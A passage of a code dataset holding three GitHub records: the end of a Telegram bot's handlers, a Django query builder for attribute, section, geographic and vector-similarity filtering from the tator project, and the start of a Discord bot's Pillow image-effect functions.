add_user(update.effective_user,context.user_data['name'],update.effective_user.first_name,context.user_data['phone'],text)\n return 'state_main'\n\ndef commandd_category(update:Update,context:CallbackContext):\n query=update.callback_query\n data=str(query.data)\n query.message.delete()\n\n if data.isdigit():\n cat_name=get_products_by_catid(int(data))[0]\n query.message.reply_photo(open('images/img.png','rb'),caption=f\"Bo'lim <b>{cat_name}</b>\",parse_mode=\"HTML\",reply_markup=product_button_bycat(int(data)))\n\n\n\n\n\n\n\n", "repo_name": "ELBEK2003/Viloyatbot", "sub_path": "functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 2813, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "telegram.Update", "line_number": 7, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 7, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 16, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 16, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 23, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 23, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 41, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 41, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 51, "usage_type": "name"}, {"api_name": "telegram.ext.CallbackContext", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "28037440980", "text": "\"\"\" TODO: add documentation for this \"\"\"\nimport logging\n\nfrom dateutil.parser import parse as dateutil_parse\nimport pytz\nimport re\nimport uuid\n\nfrom django.db.models.functions import Cast, Greatest\nfrom django.db.models import Func, F, Q, Count, Subquery, OuterRef, Value\nfrom django.contrib.gis.db.models import (\n BigIntegerField,\n BooleanField,\n CharField,\n DateTimeField,\n FloatField,\n PointField,\n TextField,\n UUIDField,\n)\nfrom enumfields import EnumField\n\nfrom django.contrib.gis.geos import Point\nfrom django.contrib.gis.measure import Distance\nfrom django.http import Http404\nfrom pgvector.django import L2Distance, MaxInnerProduct, CosineDistance, VectorField\n\nfrom ..models import (\n File,\n FileType,\n Leaf,\n LeafType,\n Localization,\n LocalizationType,\n Media,\n MediaType,\n Section,\n State,\n StateType,\n)\n\nfrom ._attributes import KV_SEPARATOR\n\nlogger = logging.getLogger(__name__)\n\nALLOWED_TYPES = {\n \"attribute\": (\"bool\", \"float\", \"datetime\", \"keyword\", \"string\", \"int\", \"enum\"),\n \"attribute_lt\": (\"float\", \"datetime\", \"int\"),\n \"attribute_lte\": (\"float\", \"datetime\", \"int\"),\n \"attribute_gt\": (\"float\", \"datetime\", \"int\"),\n \"attribute_gte\": (\"float\", \"datetime\", \"int\"),\n \"attribute_contains\": (\"keyword\", \"string\", \"enum\"),\n \"attribute_distance\": (\"geopos\",),\n}\n\nOPERATOR_SUFFIXES = {\n \"attribute\": \"\",\n \"attribute_lt\": \"__lt\",\n \"attribute_lte\": \"__lte\",\n \"attribute_gt\": \"__gt\",\n \"attribute_gte\": \"__gte\",\n \"attribute_contains\": \"__icontains\",\n \"attribute_distance\": \"__distance_lte\",\n}\n\n\ndef _sanitize(name):\n return re.sub(r\"[^a-zA-Z]\", \"_\", name)\n\n\ndef _look_for_section_uuid(media_qs, maybe_uuid_val):\n media_qs = media_qs.annotate(\n section_val=Cast(F(\"attributes__tator_user_sections\"), TextField())\n )\n # Note: This escape is required because of database_qs usage\n return media_qs.filter(section_val=f'\"{maybe_uuid_val}\"')\n\n\ndef supplied_name_to_field(supplied_name):\n logger.info(f\"SNAME={supplied_name}\")\n if supplied_name.startswith(\"-\"):\n desc = True\n supplied_name = supplied_name[1:]\n else:\n desc = False\n if supplied_name.startswith(\"$\"):\n db_lookup = supplied_name[1:]\n else:\n db_lookup = f\"attributes__{supplied_name}\"\n\n if desc:\n db_lookup = \"-\" + db_lookup\n return db_lookup\n\n\ndef _related_search(\n qs, project, relevant_state_type_ids, relevant_localization_type_ids, search_obj\n):\n related_state_types = StateType.objects.filter(pk__in=relevant_state_type_ids)\n related_localization_types = LocalizationType.objects.filter(\n pk__in=relevant_localization_type_ids\n )\n related_matches = []\n for entity_type in related_state_types:\n state_qs = State.objects.filter(\n project=project, type=entity_type, deleted=False, variant_deleted=False\n )\n state_qs = get_attribute_psql_queryset_from_query_obj(state_qs, search_obj)\n if state_qs.exists():\n related_matches.append(state_qs)\n for entity_type in related_localization_types:\n local_qs = Localization.objects.filter(\n project=project, type=entity_type, deleted=False, variant_deleted=False\n )\n local_qs = get_attribute_psql_queryset_from_query_obj(local_qs, search_obj)\n if local_qs.exists():\n related_matches.append(local_qs)\n\n if related_matches:\n # Convert result matches to use Media model because related_matches might be States or Localizations\n # Note: 'media' becomes 'id' when this happens. The two columns are 'id','count' in this result.\n # Iterate over each related match and merge it into the previous Media result set. Add 'count' so it is an accurate hit count\n # for any matching metadata.\n # Finally reselect all media in this concatenated set by id. Annotate the incident with the count from the previous record set, which is\n # now the sum of any hit across any metadata type.\n orig_list = [*related_matches]\n related_match = related_matches.pop()\n # Pop and process the list\n media_vals = related_match.values(\"media\")\n for related_match in related_matches:\n this_vals = related_match.values(\"media\")\n media_vals = media_vals.union(this_vals)\n\n # We now have all the matching media, but lost the score information\n # going back to the original set, make a bunch of subqueries to calculate the\n # greatest score for a particular media, if there were duplicates\n # list comp didn't play nice here, but this is easier to read anyway\n score = []\n for x in orig_list:\n annotated_x = x.values(\"media\").annotate(count=Count(\"media\"))\n filtered_x = annotated_x.filter(media=OuterRef(\"id\"))\n values_x = filtered_x.values(\"count\").order_by(\"-count\")[:1]\n score.append(Subquery(values_x))\n if len(score) > 1:\n qs = qs.filter(pk__in=media_vals.values(\"media\")).annotate(incident=Greatest(*score))\n else:\n qs = qs.filter(pk__in=media_vals.values(\"media\")).annotate(incident=score[0])\n else:\n qs = qs.filter(pk=-1).annotate(incident=Value(0))\n return qs\n\n\ndef _convert_boolean(value):\n if type(value) == bool:\n return value\n if value.lower() == \"false\":\n value = False\n elif value.lower() == \"true\":\n value = True\n else:\n value = bool(value)\n return value\n\n\ndef _get_info_for_attribute(entity_type, key):\n \"\"\"Returns the first matching dtype with a matching key\"\"\"\n retval = {}\n if key.startswith(\"$\"):\n if key in [\"$x\", \"$y\", \"$u\", \"$v\", \"$width\", \"$height\", \"$fps\"]:\n return {\"name\": key[1:], \"dtype\": \"float\"}\n elif key in [\n \"$version\",\n \"$user\",\n \"$type\",\n \"$created_by\",\n \"$modified_by\",\n \"$frame\",\n \"$num_frames\",\n \"$section\",\n \"$id\",\n ]:\n retval = {\"name\": key[1:], \"dtype\": \"int\"}\n elif key in [\"$created_datetime\", \"$modified_datetime\"]:\n retval = {\"name\": key[1:], \"dtype\": \"datetime\"}\n elif key in [\"$name\", \"$elemental_id\"]:\n retval = {\"name\": key[1:], \"dtype\": \"string\"}\n elif key == \"tator_user_sections\":\n retval = {\"name\": \"tator_user_sections\", \"dtype\": \"string\"}\n else:\n for attribute_info in entity_type.attribute_types:\n if attribute_info[\"name\"] == key:\n retval = attribute_info\n break\n return retval\n\n\ndef _get_field_for_attribute(entity_type, key):\n \"\"\"Returns the field type for a given key in a project/annotation_type\"\"\"\n lookup_map = {\n \"bool\": BooleanField,\n \"int\": BigIntegerField,\n \"float\": FloatField,\n \"enum\": CharField,\n \"string\": CharField,\n \"datetime\": DateTimeField,\n \"geopos\": PointField,\n \"float_array\": VectorField,\n None: None,\n }\n info = _get_info_for_attribute(entity_type, key)\n return lookup_map[info.get(\"dtype\", None)], info.get(\"size\", None)\n\n\ndef _convert_attribute_filter_value(pair, annotation_type, operation):\n kv = pair.split(KV_SEPARATOR, 1)\n key, value = kv\n info = _get_info_for_attribute(annotation_type, key)\n if \"dtype\" not in info:\n return None, None, None\n dtype = info[\"dtype\"]\n\n if dtype not in ALLOWED_TYPES[operation]:\n raise ValueError(f\"Filter operation '{operation}' not allowed for dtype '{dtype}'!\")\n if dtype == \"bool\":\n value = _convert_boolean(value)\n if dtype == \"double\":\n value = float(value)\n elif dtype == \"long\":\n value = int(value)\n elif dtype == \"date\":\n value = dateutil_parse(value)\n elif dtype == \"geopos\":\n distance, lat, lon = value.split(\"::\")\n value = (\n Point(float(lon), float(lat), srid=4326),\n Distance(km=float(distance)),\n \"spheroid\",\n )\n logger.info(f\"{distance}, {lat},{lon}\")\n return key, value, dtype\n\n\ndef get_attribute_filter_ops(params, data_type):\n filter_ops = []\n for op in ALLOWED_TYPES.keys():\n for kv in params.get(op, []):\n key, value, _ = _convert_attribute_filter_value(kv, data_type, op)\n if key:\n filter_ops.append((key, value, op))\n return filter_ops\n\n\ndef build_query_recursively(query_object, castLookup, is_media, project, all_casts):\n query = Q()\n if \"method\" in query_object:\n method = query_object[\"method\"].lower()\n sub_queries = []\n for x in query_object[\"operations\"]:\n query, casts = build_query_recursively(x, castLookup, is_media, project, all_casts)\n sub_queries.append(query)\n for cast in casts:\n all_casts.add(cast)\n if len(sub_queries) == 0:\n return Q(), []\n if method == \"not\":\n if len(sub_queries) != 1:\n raise (Exception(\"NOT operator can only be applied to one suboperation\"))\n query = ~sub_queries[0]\n elif method == \"and\":\n query = sub_queries.pop()\n for q in sub_queries:\n query = query & q\n elif method == \"or\":\n query = sub_queries.pop()\n for q in sub_queries:\n query = query | q\n else:\n attr_name = query_object[\"attribute\"]\n operation = query_object[\"operation\"]\n inverse = query_object.get(\"inverse\", False)\n value = query_object[\"value\"]\n\n if attr_name == \"$section\":\n # Handle section based look-up\n section = Section.objects.filter(pk=value)\n if not section.exists():\n raise Http404\n\n relevant_state_type_ids = StateType.objects.filter(project=project)\n relevant_localization_type_ids = LocalizationType.objects.filter(project=project)\n media_qs = Media.objects.filter(project=project)\n section_uuid = section[0].tator_user_sections\n if section_uuid:\n media_qs = _look_for_section_uuid(media_qs, section_uuid)\n\n if section[0].object_search:\n media_qs = get_attribute_psql_queryset_from_query_obj(\n media_qs, section[0].object_search\n )\n\n if section[0].related_object_search:\n media_qs = _related_search(\n media_qs,\n project,\n relevant_state_type_ids,\n relevant_localization_type_ids,\n section[0].related_object_search,\n )\n if media_qs.exists() == False:\n query = Q(pk=-1)\n elif is_media:\n query = Q(pk__in=media_qs)\n else:\n query = Q(media__in=media_qs)\n all_casts.add(\"tator_user_sections\")\n else:\n if attr_name.startswith(\"$\"):\n db_lookup = attr_name[1:]\n else:\n db_lookup = f\"casted_{_sanitize(attr_name)}\"\n if operation.startswith(\"date_\"):\n # python is more forgiving then SQL so convert any partial dates to\n # full-up ISO8601 datetime strings WITH TIMEZONE.\n operation = operation.replace(\"date_\", \"\")\n if operation == \"range\":\n utc_datetime = dateutil_parse(value[0]).astimezone(pytz.UTC)\n value_0 = utc_datetime.isoformat()\n utc_datetime = dateutil_parse(value[1]).astimezone(pytz.UTC)\n value_1 = utc_datetime.isoformat()\n value = (value_0, value_1)\n else:\n utc_datetime = dateutil_parse(value).astimezone(pytz.UTC)\n value = utc_datetime.isoformat()\n elif operation.startswith(\"distance_\"):\n distance, lat, lon = value\n value = (\n Point(float(lon), float(lat), srid=4326),\n Distance(km=float(distance)),\n \"spheroid\",\n )\n\n castFunc = castLookup.get(attr_name, None)\n # NOTE: For string functions avoid the '\"' work around due to the django\n # string handling bug\n # only apply if cast func is active\n if castFunc and operation in [\"icontains\", \"iendswith\", \"istartswith\"]:\n castFunc = lambda x: x\n # Don't use casts for these operations either\n if attr_name.startswith(\"$\") == False:\n db_lookup = f\"attributes__{attr_name}\"\n if operation in [\"isnull\"]:\n value = _convert_boolean(value)\n elif castFunc:\n value = castFunc(value)\n else:\n return Q(pk=-1), []\n if operation in [\"date_eq\", \"eq\"]:\n query = Q(**{f\"{db_lookup}\": value})\n else:\n query = Q(**{f\"{db_lookup}__{operation}\": value})\n\n # If we actually use the entity, add it to casts.\n if attr_name.startswith(\"$\") is False:\n all_casts.add(attr_name)\n if inverse:\n query = ~query\n\n return query, all_casts\n\n\ndef get_attribute_psql_queryset_from_query_obj(qs, query_object):\n if qs.exists() == False:\n return qs.filter(pk=-1)\n\n is_media = False\n if type(qs[0]) == Media:\n is_media = True\n\n typeLookup = {\n Media: MediaType,\n Localization: LocalizationType,\n State: StateType,\n Leaf: LeafType,\n File: FileType,\n }\n # NOTE: Usage of database_qs requires escaping string values manually\n # Else lookups will result in misses.\n castLookup = {\n \"bool\": _convert_boolean,\n \"int\": int,\n \"float\": float,\n \"enum\": lambda x: f'\"{x}\"',\n \"string\": lambda x: f'\"{x}\"',\n \"datetime\": str,\n \"geopos\": lambda x: x,\n \"float_array\": None,\n }\n\n attributeCast = {}\n annotateField = {}\n typeModel = typeLookup[type(qs[0])]\n typeObjects = typeModel.objects.filter(project=qs[0].project)\n for typeObject in typeObjects:\n for attributeType in typeObject.attribute_types:\n attributeCast[attributeType[\"name\"]] = castLookup[attributeType[\"dtype\"]]\n annotateField[attributeType[\"name\"]], _ = _get_field_for_attribute(\n typeObject, attributeType[\"name\"]\n )\n\n annotateField[\"tator_user_sections\"] = TextField\n attributeCast[\"tator_user_sections\"] = lambda x: f'\"{x}\"'\n for key in [\"$x\", \"$y\", \"$u\", \"$v\", \"$width\", \"$height\", \"$fps\"]:\n attributeCast[key] = float\n for key in [\n \"$version\",\n \"$user\",\n \"$type\",\n \"$created_by\",\n \"$modified_by\",\n \"$frame\",\n \"$num_frames\",\n \"$section\",\n \"$id\",\n ]:\n attributeCast[key] = int\n for key in [\n \"$created_datetime\",\n \"$modified_datetime\",\n \"$name\",\n \"$archive_state\",\n \"$elemental_id\",\n ]:\n attributeCast[key] = str\n\n q_object, required_annotations = build_query_recursively(\n query_object, attributeCast, is_media, qs[0].project, set()\n )\n\n logger.info(f\"Q_Object = {q_object}\")\n logger.info(f\"Query requires the following annotations: {required_annotations}\")\n for annotation in required_annotations:\n logger.info(f\"\\t {annotation} to {annotateField[annotation]()}\")\n if annotateField[annotation] == DateTimeField:\n # Cast DateTime to text first\n qs = qs.annotate(\n **{\n f\"casted_{_sanitize(annotation)}_text\": Cast(\n F(f\"attributes__{annotation}\"), TextField()\n )\n }\n )\n qs = qs.annotate(\n **{\n f\"casted_{_sanitize(annotation)}\": Cast(\n F(f\"casted_{_sanitize(annotation)}_text\"),\n annotateField[annotation](),\n )\n }\n )\n else:\n qs = qs.annotate(\n **{\n f\"casted_{_sanitize(annotation)}\": Cast(\n F(f\"attributes__{annotation}\"), annotateField[annotation]()\n )\n }\n )\n return qs.filter(q_object)\n\n\ndef get_attribute_psql_queryset(entity_type, qs, params, filter_ops):\n attribute_null = params.get(\"attribute_null\", [])\n float_queries = params.get(\"float_array\", [])\n\n # return original queryset if no queries were supplied\n if not (filter_ops or float_queries or attribute_null):\n return qs\n\n found_queryset = False\n for key, value, op in filter_ops:\n if key.startswith(\"$\"):\n db_field = key[1:]\n qs = qs.filter(**{f\"{db_field}{OPERATOR_SUFFIXES[op]}\": value})\n found_queryset = True\n else:\n field_type, _ = _get_field_for_attribute(entity_type, key)\n if field_type:\n # Annotate with a typed object prior to query to ensure index usage\n alias_key = re.sub(r\"[^\\w]\", \"__\", key)\n if field_type == PointField:\n qs = qs.annotate(\n **{f\"{alias_key}_0_float\": Cast(f\"attributes__{key}__0\", FloatField())}\n )\n qs = qs.annotate(\n **{f\"{alias_key}_1_float\": Cast(f\"attributes__{key}__1\", FloatField())}\n )\n qs = qs.annotate(\n **{\n f\"{alias_key}_typed\": Cast(\n Func(\n F(f\"{alias_key}_0_float\"),\n F(f\"{alias_key}_1_float\"),\n function=\"ST_MakePoint\",\n ),\n PointField(srid=4326),\n )\n }\n )\n qs = qs.filter(**{f\"{alias_key}_typed{OPERATOR_SUFFIXES[op]}\": value})\n elif field_type == DateTimeField:\n qs = qs.annotate(\n **{f\"{alias_key}_text\": Cast(f\"attributes__{key}\", CharField())}\n )\n qs = qs.annotate(\n **{f\"{alias_key}_typed\": Cast(f\"{alias_key}_text\", DateTimeField())}\n )\n qs = qs.filter(**{f\"{alias_key}_typed{OPERATOR_SUFFIXES[op]}\": value})\n elif field_type == CharField or field_type == EnumField:\n qs = qs.annotate(\n **{f\"{alias_key}_typed\": Cast(f\"attributes__{key}\", field_type())}\n )\n if OPERATOR_SUFFIXES[op]:\n qs = qs.filter(**{f\"{alias_key}_typed{OPERATOR_SUFFIXES[op]}\": value})\n else:\n # BUG: database_qs mangles the SQL and requires this workaround:\n # This is only on equal for some reason.\n qs = qs.filter(\n **{f\"{alias_key}_typed{OPERATOR_SUFFIXES[op]}\": f'\"{value}\"'}\n )\n else:\n qs = qs.annotate(\n **{f\"{alias_key}_typed\": Cast(f\"attributes__{key}\", field_type())}\n )\n qs = qs.filter(**{f\"{alias_key}_typed{OPERATOR_SUFFIXES[op]}\": value})\n found_queryset = True\n\n if attribute_null is not None:\n for kv in attribute_null:\n key, value = kv.split(KV_SEPARATOR)\n value = _convert_boolean(value)\n if value:\n qs = qs.filter(\n Q(**{f\"attributes__contains\": {key: None}})\n | ~Q(**{f\"attributes__has_key\": key})\n )\n else:\n # Returns true if the attributes both have a key and it is not set to null\n qs = qs.filter(**{f\"attributes__has_key\": key})\n qs = qs.filter(~Q(**{f\"attributes__contains\": {key: None}}))\n found_queryset = True\n\n for query in float_queries:\n if \"type\" not in params:\n raise Exception(\"Must supply 'type' if supplying a float_query.\")\n logger.info(f\"EXECUTING FLOAT QUERY={query}\")\n found_queryset = True\n name = query[\"name\"]\n center = query[\"center\"]\n upper_bound = query.get(\"upper_bound\", None)\n lower_bound = query.get(\"lower_bound\", None)\n metric = query.get(\"metric\", \"l2norm\")\n order = query.get(\"order\", \"asc\")\n field_type, size = _get_field_for_attribute(entity_type, name)\n if field_type:\n found_queryset = True\n qs = qs.filter(type=params[\"type\"])\n qs = qs.annotate(**{f\"{name}_char\": Cast(f\"attributes__{name}\", CharField())})\n qs = qs.annotate(\n **{f\"{name}_typed\": Cast(f\"{name}_char\", VectorField(dimensions=size))}\n )\n if metric == \"l2norm\":\n qs = qs.annotate(**{f\"{name}_distance\": L2Distance(f\"{name}_typed\", center)})\n elif metric == \"cosine\":\n qs = qs.annotate(**{f\"{name}_distance\": CosineDistance(f\"{name}_typed\", center)})\n elif metric == \"ip\":\n qs = qs.annotate(**{f\"{name}_distance\": MaxInnerProduct(f\"{name}_typed\", center)})\n\n if upper_bound:\n qs = qs.filter(**{f\"{name}_distance__lte\": upper_bound})\n if lower_bound:\n qs = qs.filter(**{f\"{name}_distance__gte\": lower_bound})\n if order == \"asc\":\n qs = qs.order_by(f\"{name}_distance\")\n else:\n qs = qs.order_by(f\"-{name}_distance\")\n\n return qs if found_queryset else None\n", "repo_name": "cvisionai/tator", "sub_path": "api/main/rest/_attribute_query.py", "file_name": "_attribute_query.py", "file_ext": "py", "file_size_in_byte": 22068, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 88, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 44, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 68, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 73, "usage_type": "call"}, {"api_name": "django.db.models.F", "line_number": 73, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 73, "usage_type": "call"}, {"api_name": "models.StateType.objects.filter", "line_number": 99, "usage_type": "call"}, {"api_name": "models.StateType.objects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "models.StateType", "line_number": 99, "usage_type": "name"}, {"api_name": "models.LocalizationType.objects.filter", "line_number": 100, "usage_type": "call"}, {"api_name": "models.LocalizationType.objects", "line_number": 100, "usage_type": "attribute"}, {"api_name": "models.LocalizationType", "line_number": 100, "usage_type": "name"}, {"api_name": "models.State.objects.filter", "line_number": 105, "usage_type": "call"}, {"api_name": "models.State.objects", "line_number": 105, "usage_type": "attribute"}, {"api_name": "models.State", "line_number": 105, "usage_type": "name"}, {"api_name": "models.Localization.objects.filter", "line_number": 112, "usage_type": "call"}, {"api_name": "models.Localization.objects", "line_number": 112, "usage_type": "attribute"}, {"api_name": "models.Localization", "line_number": 112, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 140, "usage_type": "call"}, {"api_name": "django.db.models.OuterRef", "line_number": 141, "usage_type": "call"}, {"api_name": "django.db.models.Subquery", "line_number": 143, "usage_type": "call"}, {"api_name": "django.db.models.functions.Greatest", "line_number": 145, "usage_type": "call"}, {"api_name": "django.db.models.Value", "line_number": 149, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.BooleanField", "line_number": 200, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.BigIntegerField", "line_number": 201, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.FloatField", "line_number": 202, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 203, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 204, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.DateTimeField", "line_number": 205, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PointField", "line_number": 206, "usage_type": "name"}, {"api_name": "pgvector.django.VectorField", "line_number": 207, "usage_type": "name"}, {"api_name": "_attributes.KV_SEPARATOR", "line_number": 215, "usage_type": "argument"}, {"api_name": "dateutil.parser.parse", "line_number": 231, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.Point", "line_number": 235, "usage_type": "call"}, {"api_name": "django.contrib.gis.measure.Distance", "line_number": 236, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 254, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 264, "usage_type": "call"}, {"api_name": "models.Section.objects.filter", "line_number": 285, "usage_type": "call"}, {"api_name": "models.Section.objects", "line_number": 285, "usage_type": "attribute"}, {"api_name": "models.Section", "line_number": 285, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 287, "usage_type": "name"}, {"api_name": "models.StateType.objects.filter", "line_number": 289, "usage_type": "call"}, {"api_name": "models.StateType.objects", "line_number": 289, "usage_type": "attribute"}, {"api_name": "models.StateType", "line_number": 289, "usage_type": "name"}, {"api_name": "models.LocalizationType.objects.filter", "line_number": 290, "usage_type": "call"}, {"api_name": "models.LocalizationType.objects", "line_number": 290, "usage_type": "attribute"}, {"api_name": "models.LocalizationType", "line_number": 290, "usage_type": "name"}, {"api_name": "models.Media.objects.filter", "line_number": 291, "usage_type": "call"}, {"api_name": "models.Media.objects", "line_number": 291, "usage_type": "attribute"}, {"api_name": "models.Media", "line_number": 291, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 310, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 312, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 314, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 326, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 326, "usage_type": "attribute"}, {"api_name": "dateutil.parser.parse", "line_number": 328, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 328, "usage_type": "attribute"}, {"api_name": "dateutil.parser.parse", "line_number": 332, "usage_type": "call"}, {"api_name": "pytz.UTC", "line_number": 332, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.geos.Point", "line_number": 337, "usage_type": "call"}, {"api_name": "django.contrib.gis.measure.Distance", "line_number": 338, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 356, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 358, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 360, "usage_type": "call"}, {"api_name": "models.Media", "line_number": 376, "usage_type": "name"}, {"api_name": "models.Media", "line_number": 380, "usage_type": "name"}, {"api_name": "models.Localization", "line_number": 381, "usage_type": "name"}, {"api_name": "models.State", "line_number": 382, "usage_type": "name"}, {"api_name": "models.Leaf", "line_number": 383, "usage_type": "name"}, {"api_name": "models.File", "line_number": 384, "usage_type": "name"}, {"api_name": "models.MediaType", "line_number": 380, "usage_type": "name"}, {"api_name": "models.LocalizationType", "line_number": 381, "usage_type": "name"}, {"api_name": "models.StateType", "line_number": 382, "usage_type": "name"}, {"api_name": "models.LeafType", "line_number": 383, "usage_type": "name"}, {"api_name": "models.FileType", "line_number": 384, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 410, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.DateTimeField", "line_number": 443, "usage_type": "name"}, {"api_name": "django.db.models.functions.Cast", "line_number": 447, "usage_type": "call"}, {"api_name": "django.db.models.F", "line_number": 448, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 448, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 454, "usage_type": "call"}, {"api_name": "django.db.models.F", "line_number": 455, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 463, "usage_type": "call"}, {"api_name": "django.db.models.F", "line_number": 464, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 489, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.PointField", "line_number": 490, "usage_type": "name"}, {"api_name": "django.db.models.functions.Cast", "line_number": 492, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.FloatField", "line_number": 492, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 495, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.FloatField", "line_number": 495, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 499, "usage_type": "call"}, {"api_name": "django.db.models.Func", "line_number": 500, "usage_type": "call"}, {"api_name": "django.db.models.F", "line_number": 501, "usage_type": "call"}, {"api_name": "django.db.models.F", "line_number": 502, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.PointField", "line_number": 505, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.DateTimeField", "line_number": 510, "usage_type": "name"}, {"api_name": "django.db.models.functions.Cast", "line_number": 512, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 512, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 515, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.DateTimeField", "line_number": 515, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 518, "usage_type": "name"}, {"api_name": "enumfields.EnumField", "line_number": 518, "usage_type": "name"}, {"api_name": "django.db.models.functions.Cast", "line_number": 520, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 532, "usage_type": "call"}, {"api_name": "_attributes.KV_SEPARATOR", "line_number": 539, "usage_type": "argument"}, {"api_name": "django.db.models.Q", "line_number": 543, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 544, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 549, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 567, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 567, "usage_type": "call"}, {"api_name": "django.db.models.functions.Cast", "line_number": 569, "usage_type": "call"}, {"api_name": "pgvector.django.VectorField", "line_number": 569, "usage_type": "call"}, {"api_name": "pgvector.django.L2Distance", "line_number": 572, "usage_type": "call"}, {"api_name": "pgvector.django.CosineDistance", "line_number": 574, "usage_type": "call"}, {"api_name": "pgvector.django.MaxInnerProduct", "line_number": 576, "usage_type": "call"}]} +{"seq_id": "34095665120", "text": "from PIL import Image, ImageFilter, ImageOps, ImageEnhance, ImageDraw, ImageFont\nfrom discord.ext import commands\nfrom .image_handling import get_image, send_image\n\n\ndef wrap_line(draw, font, line, width):\n # check if line already fits\n size = draw.textsize(line, font)\n if size[0] < width:\n return line, \"\"\n space = line.find(' ', 0)\n if space == -1: # There's only one word\n return line, \"\"\n # the first 'previous space', is the first space\n prev_space = space\n while space != -1:\n size = draw.textsize(line[:space], font=font)\n if size[0] >= width:\n return line[:prev_space], line[prev_space + 1:]\n prev_space = space\n space = line.find(' ', prev_space + 1)\n return line[:prev_space], line[prev_space + 1:]\n\n\ndef wrap_text(draw, font, text, width):\n result = \"\"\n for remaining_line in text.splitlines():\n if not remaining_line:\n result += \"\\n\"\n while remaining_line:\n line, remaining_line = wrap_line(draw, font, remaining_line, width)\n result += line\n result += '\\n'\n return result.rstrip()\n\n\ndef blur(image):\n return image.filter(ImageFilter.BLUR)\n\n\ndef invert(image):\n try:\n alpha = image.getchannel('A')\n except ValueError:\n alpha = None\n image = image.convert(\"RGB\")\n image = ImageOps.invert(image)\n if alpha:\n image.putalpha(alpha)\n return image\n\n\ndef flipv(image):\n return ImageOps.flip(image)\n\n\ndef fliph(image):\n return ImageOps.mirror(image)\n\n\ndef symm(image, side='left'):\n w, h = image.size\n if side == 'left':\n crop = image.crop((0, 0, w // 2, h))\n crop = ImageOps.mirror(crop)\n image.paste(crop, (round(w / 2 + 0.1), 0))\n elif side == 'right':\n crop = image.crop((round(w / 2 + 0.1), 0, w, h))\n crop = ImageOps.mirror(crop)\n image.paste(crop, (0, 0))\n elif side == 'up':\n crop = image.crop((0, 0, w, h // 2))\n crop = ImageOps.flip(crop)\n image.paste(crop, (0, round(h / 2 + 0.1)))\n elif side == 'down':\n crop = image.crop((0, round(h / 2 + 0.1), w, h))\n crop = ImageOps.flip(crop)\n image.paste(crop, (0, 0))\n return image\n\n\ndef posterize(image):\n try:\n alpha = image.getchannel('A')\n except ValueError:\n alpha = None\n image = image.convert(\"RGB\")\n image = ImageOps.posterize(image, 2)\n if alpha:\n image.putalpha(alpha)\n return image\n\n\ndef shrink(image, per=5):\n image = image.convert(\"RGBA\")\n w = image.width * per // 100\n h = image.height * per // 100\n image = image.resize((w, h), resample=Image.LANCZOS)\n return 